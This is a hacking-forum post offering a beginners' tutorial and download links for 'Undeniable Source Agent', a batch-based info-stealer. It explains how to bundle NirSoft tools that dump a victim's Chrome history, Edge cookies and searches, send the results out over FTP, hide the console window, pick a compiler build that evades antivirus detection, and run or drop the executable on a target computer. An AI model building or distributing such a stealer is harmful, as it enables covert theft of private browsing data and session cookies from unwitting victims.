[FOR BEGINNERS] Create malware with just a few lines of code...

hacxx

Member
Joined
25 Mar 2021
Messages
746
Reaction score
40
Points
48
This tutorial explain in detail how to edit Undeniable Source Agent. The user will need to buy a copy of Quick Batch File Compiler or search online for a rare release of Quick Batch File Compiler to avoid detections.

How to?
1 - Start by opening file.bat with Quick Batch File Compiler
2.jpg


2 - Change username and password after ftp line
First line username, Second line password

Or use the default.
The files uploaded cannot be deleted, only if no download happen in 30 days it is removed.

3 - Go to Embedded Files and add your app icon (https://iconarchive.com/ - Professional icons)
4 - Untick Add Administrator manifest.

5 - Add ChromeHistoryView.exe, EdgeCookiesView.exe, MyLastSearch.exe, USBDeview.exe and main.bat to the vault.
(https://www.nirsoft.net/ for useful executables)

NOTE: The coder can add as many executables as he or she wants. The only problem is that the executables must be not detected.

1.jpg


NOTE: The batch (file.bat) is setup to run locally showing a console to the user.
Let's change that and conclude the tutorial...

6 - Go to source and add to all exes %MYFILES%\

Example: ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html
To: %MYFILES%\ChromeHistoryView.exe /shtml c:\windows\temp\Chrome-History.html

3.jpg


7 - On Quick Batch File Compiler go to Project > Options

8 - Tick the box Ghost Application, Untick Show splash on startup and ok.

9 - Go to Project > Compile and save the exe.

10 - Go to your target computer and execute the exe or find your way in to drop the executable.
------------------------------------------------------------------------------------------------
I'm releasing version 2 which fixes a bug i didn't had fixed in version 1.

Download:
https://filecrypt.cc/Container/DD10E0EE57.html
http://gigapeta.com/dl/10067377a5aa41c
https://oxy.cloud/d/HHQe
https://ddownload.com/px9u2texbl8o/Undeniable_Source_Agent_2.rar

Virustotal:
Not detected in original form, must be compiled to check results.
-------------------------------------------------------------------------------------------------